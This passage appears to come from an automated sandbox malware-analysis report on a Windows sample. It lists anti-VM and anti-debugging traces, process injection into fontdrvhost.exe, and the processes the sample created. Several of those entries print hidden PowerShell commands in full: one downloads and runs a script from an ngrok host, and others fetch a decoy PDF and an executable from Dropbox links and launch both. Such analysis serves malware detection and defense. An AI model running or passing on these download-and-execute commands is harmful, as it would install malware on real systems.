                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeAPI/Special instruction interceptor: Address: 7FF8C88ED044
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED044
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 56CB83A
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: fontdrvhost.exe, 00000019.00000002.2762783406.00000000037F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                    Source: 111392827.exe, 00000016.00000002.2668588837.0000000000909000.00000040.00001000.00020000.00000000.sdmp, 111392827.exe, 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000018.00000003.2641157936.0000000000619000.00000040.00000400.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2631854093.0000000000619000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                    Source: 111392827.exeBinary or memory string: CFF EXPLORER.EXE
                    Source: 111392827.exe, 00000016.00000002.2668588837.0000000000909000.00000040.00001000.00020000.00000000.sdmp, 111392827.exe, 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000018.00000003.2641157936.0000000000619000.00000040.00000400.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2631854093.0000000000619000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                    Source: fontdrvhost.exe, 00000019.00000002.2762783406.00000000037F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OCEXP64.EXETCPVIEW.EXETCPVIEW64.EXEPROCMON.EXE33
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4739Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5120Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5157
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4452
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeDropped PE file which has not been started: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeAPI coverage: 1.1 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 344Thread sleep count: 4739 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5268Thread sleep count: 5120 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5668Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 6120Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8616Thread sleep count: 5157 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8680Thread sleep time: -21213755684765971s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8728Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8612Thread sleep count: 4452 > 30
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,22_2_00411150
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004631F0 FindFirstFileW,FindNextFileW,FindClose,22_2_004631F0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0045A7D0 GetDiskFreeSpaceExW,GetDiskFreeSpaceW,FindFirstFileW,FindClose,GetDiskFreeSpaceW,22_2_0045A7D0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00462F00 FindFirstFileW,FindClose,22_2_00462F00
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,24_2_00411150
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_004631F0 FindFirstFileW,FindNextFileW,FindClose,24_2_004631F0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0045A7D0 GetDiskFreeSpaceExW,GetDiskFreeSpaceW,FindFirstFileW,FindClose,GetDiskFreeSpaceW,24_2_0045A7D0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00462F00 FindFirstFileW,FindClose,24_2_00462F00
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
                    Source: fontdrvhost.exe, 00000019.00000003.2646521849.0000000005600000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
                    Source: svchost.exe, 00000006.00000002.3285634194.0000018A79457000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000002.2756628093.0000000003192000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: msedge.exe, 00000005.00000003.2215359947.00003C1000340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
                    Source: 111392827.exe, 00000016.00000002.2669074846.0000000002866000.00000004.00001000.00020000.00000000.sdmp, 111392827.exe, 00000016.00000000.2449282518.0000000000599000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: WFQEMU_
                    Source: fontdrvhost.exe, 00000019.00000003.2646521849.0000000005600000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: svchost.exe, 00000006.00000002.3281965160.0000018A73C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
                    Source: msedge.exe, 00000005.00000002.2231876277.0000024149243000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2521531111.0000028B71F70000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2409487598.0000022184646000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: fontdrvhost.exe, 00000019.00000002.2756628093.0000000003192000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW#
                    Source: powershell.exe, 00000002.00000002.2388717864.000001BD9C2D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPP
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeAPI call chain: ExitProcess graph end nodegraph_22-44376
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_006091B0 LdrInitializeThunk,VirtualFree,24_3_006091B0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004734E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_004734E6
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004150A0 GetModuleHandleW,LoadLibraryW,GetProcAddress,22_2_004150A0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_00609277 mov eax, dword ptr fs:[00000030h]24_3_00609277
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 25_3_03000283 mov eax, dword ptr fs:[00000030h]25_3_03000283
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00474040 GetProcessHeap,HeapFree,22_2_00474040
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeProcess created: C:\Users\user\AppData\Local\Temp\111392827.exe "C:\Users\user\AppData\Local\Temp\111392827.exe"
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004734E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_004734E6
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_004734E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_004734E6

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeMemory written: C:\Users\user\AppData\Local\Temp\111392827.exe base: 5D0000 value starts with: 4D5A
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\399226976.bat" "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1262855704.pdf
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\111392827.exe "C:\Users\user\AppData\Local\Temp\111392827.exe"
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$randompdf = \"$env:temp\$(get-random).pdf\"; $randomexe = \"$env:temp\$(get-random).exe\"; iwr -uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/lewis-silkin-llp.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -outfile $randompdf ; start-process msedge.exe -argumentlist \"--kiosk $randompdf\" ; iwr -uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -outfile $randomexe ; start $randomexe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$randompdf = \"$env:temp\$(get-random).pdf\"; $randomexe = \"$env:temp\$(get-random).exe\"; iwr -uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/lewis-silkin-llp.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -outfile $randompdf ; start-process msedge.exe -argumentlist \"--kiosk $randompdf\" ; iwr -uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -outfile $randomexe ; start $randomexe"
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00502A5F cpuid 22_2_00502A5F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
